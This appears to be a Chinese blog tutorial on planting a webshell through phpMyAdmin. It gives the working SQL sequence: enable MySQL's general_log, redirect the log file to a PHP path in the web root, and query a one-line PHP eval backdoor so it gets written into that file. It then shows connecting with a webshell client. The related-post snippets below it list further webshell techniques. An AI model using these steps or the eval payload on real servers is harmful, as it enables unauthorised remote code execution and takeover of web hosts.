2. 程式人生 > >通過phpMyAdmin拿webshell

通過phpMyAdmin拿webshell

阿新 發佈:2018-01-30
img 進行 root權限 val 是否 src sele bsp 查詢

general_log默認為關閉的,root權限開啟後,general_log_file會保存所有的查詢語句

所以可以開啟general_log,然後設置general_log_file為一個php文件,最後用一句話木馬進行查詢來獲取webshell

進入phpMyAdmin後在SQL處執行SQL語句

首先查看general log是否開啟

show variables like ‘general_log‘;

技術分享圖片

general log是關閉狀態,執行SQL語句開啟general log

set global general_log=on;

技術分享圖片

開啟成功

然後把general_log_file設置為shell的絕對路徑

SET global general_log_file=‘C:/phpStudy/PHPTutorial/WWW/x.php‘;

技術分享圖片

創建的x.php裏的內容

技術分享圖片

然後執行SQL查詢語句

SELECT ‘<?php @eval($_POST["x"]);?>‘;

執行成功

技術分享圖片

看一下x.php裏的內容

技術分享圖片

成功插入了一句話木馬

用菜刀連接,看看是否能夠解析的

技術分享圖片

連接成功

通過phpMyAdmin拿webshell

相關推薦

通過phpMyAdminwebshell

img 進行 root權限 val 是否 src sele bsp 查詢 general_log默認為關閉的,root權限開啟後,general_log_file會保存所有的查詢語句 所以可以開啟general_log,然後設置general_log_file為一個php文

phpmyadmin通過日誌檔案webshell

該方法非原創。只是給大家分享一下姿勢。如果知道得就當複習了,不知道得就搗鼓搗鼓。 前提:條件是root使用者。 思路:就是利用mysql的一個日誌檔案。這個日誌檔案每執行一個sql語句就會將其執行的儲存。我們將這個日誌檔案重新命名為我們的shell.php然後執行一條sql帶一句話木馬的命令。然後執行菜刀

通過phpmyadmin root許可權shell

先登入進phpmyadmin root許可權進來----------- Step1  -------->>>>>>點mysql 如圖. Step 2 -------->>>>>> 點SQL這裡 Step

數據庫備份webshell簡單記錄

數據庫備份 webshell 數據庫備份拿webshell主要前提是能進入到應用系統後臺,並且有數據庫備份功能(有點廢話了)! 當我們想法設法進入到一個系統後臺之後,本以為找一個文件上傳的地方來上傳一個webshell,但是上傳點卻是限制得死死的,高強度的白名單限制,各種繞過都沒有成功,

DVWA_File Inclusion 檔案包含 遠端檔案包含webshell

    MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );

我是如何通過學習到年薪80w

本人做了5年Java,如今還是一個碼農,天天寫業務程式碼,直到2018年11月中旬遇到一位技術大牛,他給我一套技術思維導圖讓我又看到了希望!今天分享給各位想要提升、升職、加薪的你。 普通Java程式設計師與架構師之間的差距! (Java程式設計師的進階之路如下) 1.閱讀原始碼 閱讀原始碼

上傳木馬webshell的方法彙總

上傳木馬拿webshell的幾種方法彙總(不全) 普通許可權下拿webshell 使用sql注入拿webshell 頭像上傳木馬 檔案上傳漏洞 遠端命令執行

MySQL 寫一句話 WebShell

本文介紹兩種利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into outfile 介紹 利用需要滿足以下條

MSSQL注入之木馬上傳webshell

1.檢測是否存在注入點:依次新增語句',and 1=1和and 1=2,來判斷網站是否存在注入點 2.利用語句:a' having 1=1--爆出表名和欄位名AdminUser.AdminId 3.接著爆出其他欄位: a' group by adminuser.admini

菜鳥webshell

通過幾次成功的拿Webshell,發現自己有時也走了一些彎路,為了避免其他的朋友再在困惑中迷失方向,現在我將自己的一些經驗寫出來,希望對一些想學拿Webshell的朋友有一定的幫助。   首先我們要確定我們要檢測的網站,可以是自己定下的某個網站,也可以是自己通過Googl

Burpsuite截斷上傳webshell

在後臺上傳圖片的地方新增xxx.jpg 圖片開啟burpsiute​ 進入proxy後進入options修改代理埠等​ 然後設定瀏覽器​ 在瀏覽器裡提交上傳擷取到資料​ 修改/pimage => /pimage/xx.asp​ 最後把空格修改​ 得到websh

webshell許可權的45種方法

1, 到GoogLe,搜尋一些關鍵字,edit.asp? 韓國肉雞為多,多數為MSSQL資料庫! 2, 到Google ,site:cq.cn inurl:asp 3, 利用挖掘雞和一個ASP木馬. 檔名是login.asp 路徑組是/manage/ 關鍵詞是went.asp

MySQL WebShell

bsh 配置 post 分隔 int style 暫時 關閉 out 兩種常規方法利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into

PhpMyadmin利用Mysql root密碼獲取webshell

webshell windows 管理系統 管理員 源代碼 Simeon Phpmyadmin是一款著名的mysql在線管理系統,通過提供的mysql數據庫用戶賬號和密碼對所管理的數據庫實施操作。在滲透過程中,一旦獲取其mysql賬號和對應的密碼,輕者獲取其賬號所管理數據庫,重者可以配

在CentOS7上通過RPM安裝實現LAMP+phpMyAdmin過程全記錄

isp -s 管理工具 gpgcheck b2c link 5.5 art http 在CentOS7上通過RPM安裝實現LAMP+phpMyAdmin過程全記錄 時間:2017年9月20日 一、軟件環境: IP:192.168.1.71 Hostname:centos73

科目四考試通過到駕照有感

分享 pos 考試通過 自律 info 通過 技術 com post 江河湖海闖五洲, 一生風雨愛自由。 莫忘規章當自律, 展翅翺翔信天遊! 科目四考試通過拿到駕照有感

有科學家著資助,試圖通過冷凍大腦讓富豪們永生

永生在科幻作品中常常能看到一個橋段,探險家們誤入南極/北極的冰窟,發現了一具在幾千年前被意外冷凍起來的人體冰雕,把冰雕扛回實驗室進行“高科技解凍”之後,這位來自千萬年前的人類奇跡般的醒來,開始一部長達幾十集的穿越題材科幻劇。當然,理論上來講這樣因為自然發生的人體冷凍是無法讓人在解凍後復活的——冰晶形成時會刺破

解決蛋問題的時候,通過幾個shell腳本運算速度對比,體會了算法和編程優化的重要性

拿蛋問題 shell腳本運算速度對比 算法和編程優化 前幾天,一位同學在群裏提出一個拿蛋的問題,原題如下:有一筐雞蛋,1個1個拿,正好拿完2個2個拿,正好拿完3個3個拿,正好拿完4個4個拿,剩下2個5個5個拿,剩下4個6個6個拿,正好拿完7個7個拿,剩下5個8個8個拿,剩下2個9個9個拿,正好拿完

new URLSearchParams() 內建物件獲取位址列的引數 通過鍵的方式到值

首先宣告一下 隨便賦個值也行 let a = new URLSearchParams(location.search); 然後通過a.get()的方式輸入鍵 拿到值 就簡單點吧 拿到前一個頁面傳過來的id let id = a.get(‘id’); 這樣就可以直接拿到id了 下面這個

通過一個一維vector到tensor對應元素

我的需求是有一個15*4的tensor, 有一個15*1的index vector, 希望從tensor裡面拿到對應的15*1的vector 查了半天gather未果, 因為gather()只能拿一個slice gather_nd也不是很好的解決方法, 不過可以實現, 需要把index變